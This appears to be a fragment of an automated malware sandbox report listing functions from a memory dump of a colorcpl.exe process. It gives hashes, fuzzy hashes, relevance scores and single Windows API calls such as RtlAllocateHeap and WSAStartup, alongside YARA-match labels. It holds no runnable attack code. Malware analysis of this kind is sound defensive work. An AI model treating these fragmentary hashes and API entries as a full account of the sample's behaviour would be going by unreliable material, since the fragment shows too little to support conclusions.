                                                                            • API String ID: 176396367-0
                                                                            • Opcode ID: 516f29abe02dee93832c7d1789e0837183ed8524066e336b7e29a9a2d9a41228
                                                                            • Instruction ID: e83321ac34f3245ccf6eab029adf7f3cd4e0ac1d30445371bb5156b9c7455aa5
                                                                            • Opcode Fuzzy Hash: 516f29abe02dee93832c7d1789e0837183ed8524066e336b7e29a9a2d9a41228
                                                                            • Instruction Fuzzy Hash: 7711AF719002099BEB15EF68E8519EFBBF4EF54218B00001EE80793290FF34BD09CB98
                                                                            Function 046A61B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,04695349,?,?,046988C7,?,?,pth_unenc,?,?,0466DE9D,04695349,?,?,?,?), ref: 046A61EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 264e64f52270a3d07129202de482586b8f2df6dd132543f1256441b95c173e8f
                                                                            • Instruction ID: bc9b64133c40a4f6b62ec672133402f8b3fb0010c9a5720f36575f9bdc83d91a
                                                                            • Opcode Fuzzy Hash: 264e64f52270a3d07129202de482586b8f2df6dd132543f1256441b95c173e8f
                                                                            • Instruction Fuzzy Hash: FBE0E531E01E1156E7302A2DDC08B6B3E59CF623A0F0D1125AD8596681FF14FD628DE4
                                                                            Function 0466489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 046648B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Startup
                                                                            • String ID:
                                                                            • API String ID: 724789610-0
                                                                            • Opcode ID: b881b6dadf6f5c751fcb871ec22819b9f167e2913d19a34b3a8e3692d29c0b59
                                                                            • Instruction ID: 4ac57fc2e46239b6199aebc55ff9f6316abd25f0ec02527b2fc509abd5e41ada
                                                                            • Opcode Fuzzy Hash: b881b6dadf6f5c751fcb871ec22819b9f167e2913d19a34b3a8e3692d29c0b59
                                                                            • Instruction Fuzzy Hash: CBD0127295960C4EE720A9B4A80F8A5775CC316615F0407AB6DB5836C2F6481B1CC2E7